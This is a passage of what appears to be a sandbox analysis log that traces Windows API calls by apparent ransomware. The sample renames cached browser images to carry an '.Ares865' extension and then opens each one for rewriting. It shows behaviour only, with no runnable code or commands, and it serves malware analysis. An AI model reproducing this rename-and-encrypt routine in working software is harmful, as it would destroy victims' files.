(in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2093) returned 1 [0094.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg.Ares865") returned 117 [0094.842] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5877) returned 1 [0094.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg.Ares865") returned 117 [0094.846] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBZ5vT[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbz5vt[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3104) returned 1 [0094.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg.Ares865") returned 117 [0094.851] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.852] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2158) returned 1 [0094.855] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg.Ares865") returned 117 [0094.855] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg.ares865"), dwFlags=0x1) returned 1 [0094.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2158) returned 1 [0094.859] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg.Ares865") returned 117 [0094.859] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC03B1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc03b1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2202) returned 1 [0094.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg.Ares865") returned 117 [0094.864] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1979) returned 1 [0094.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg.Ares865") returned 117 [0094.868] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2475) returned 1 [0094.872] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg.Ares865") returned 117 [0094.872] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.874] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2045) returned 1 [0094.876] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg.Ares865") returned 117 [0094.876] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.878] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2095) returned 1 [0094.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg.Ares865") returned 117 [0094.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.882] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6910) returned 1 [0094.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg.Ares865") returned 117 [0094.885] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.887] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8131) returned 1 [0094.894] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg.Ares865") returned 117 [0094.894] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.896] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11979) returned 1 [0094.902] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg.Ares865") returned 117 [0094.902] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.904] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2501) returned 1 [0094.907] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg.Ares865") returned 117 [0094.907] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE972F[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe972f[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.908] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9833) returned 1 [0094.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg.Ares865") returned 117 [0094.911] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10871) returned 1 [0094.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg.Ares865") returned 117 [0094.917] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEdrqt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbedrqt[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.919] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12259) returned 1 [0094.922] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg.Ares865") returned 117 [0094.922] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.924] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2135) returned 1 [0094.927] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg.Ares865") returned 117 [0094.927] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg"), 